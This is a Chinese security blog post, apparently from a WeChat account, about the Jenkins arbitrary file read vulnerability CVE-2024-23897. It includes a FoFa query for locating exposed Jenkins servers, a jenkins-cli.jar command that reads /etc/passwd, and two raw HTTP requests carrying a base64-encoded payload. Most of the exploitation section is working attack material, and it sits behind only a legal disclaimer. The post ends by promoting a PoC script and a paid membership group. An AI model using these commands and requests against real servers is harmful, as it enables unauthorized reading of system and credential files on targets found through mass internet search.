请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习交流使用,如若非法他用,与平台和本文作者无关,需自行负责!
00
漏洞概述
Jenkins 的args4j库在处理Jenkins CLI命令行参数时的一个设计缺陷,即默认允许使用@符号引用文件内容,导致未经身份验证的任意文件读取
01
空间搜索语法
FoFa
app="Jenkins"
02
利用过程
登录页面如下
使用官网自带的jenkins-cli.jar执行命令,访问随意一个jenkins网站,拼接路径/jnlpJars/jenkins-cli.jar即可下载。
java -jar jenkins-cli.jar -s http://192.168.199.128:8080/ connect-node "@/etc/passwd"
请求包如下:
注意!需要同时发送两个请求哦,先download再upload。
POST /cli?remoting=false HTTP/1.1Host: 192.168.199.128:8080User-Agent: Java/1.8.0_371Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Connection: closeContent-type: application/x-www-form-urlencodedSession: bb5cec5d-6e66-4e09-aaa3-dbb942ca02c7Side: downloadAccept-Encoding: gzip, deflate, brConnection: closeContent-Length: 0
POST /cli?remoting=false HTTP/1.1Host: 192.168.199.128:8080User-Agent: Java/1.8.0_371Content-Length: 65Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Connection: closeContent-type: application/octet-streamSession: bb5cec5d-6e66-4e09-aaa3-dbb942ca02c7Side: uploadAccept-Encoding: gzip, deflate, brConnection: closebase64_decode(AAAADgAADGNvbm5lY3Qtbm9kZQAAAA4AAAxAL2V0Yy9wYXNzd2QAAAAFAgADR0JLAAAABwEABXpoX0NOAAAAAAM=)
03
nuclei poc
获取脚本关注本公众号后发送:jenkins1
04
周末限时福利
考虑到团队运营成本和公众号福利发放,创建知识星球欢迎各位师傅打赏💰后期会用打赏的资金去做福利。星球的性价比真的比较可观,绝对不会因为某些身外之物水文章,安全圈很小,主要是和师傅们交个朋友。还请各位师傅监督团队后边的表现,将心比心!
进入星球你能直接收获到:
-
优先于公众号的POC更新(提前一两周~~)
-
定制化的成品工具开发
-
私人定制的客户需求(要求不要太过分呦~~)
-
实战技巧、攻防思路
-
杂七杂八的技术小福利
-
根据能力不定期的星球内部抽奖
-
更多漏洞利用Tips
欢迎各位师傅加入哦~~
进入星球直接能学习到这些漏洞:
✓
关注我们
原文始发于微信公众号(天澜实验室):Jenkins 任意文件读取 CVE-2024-23897
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论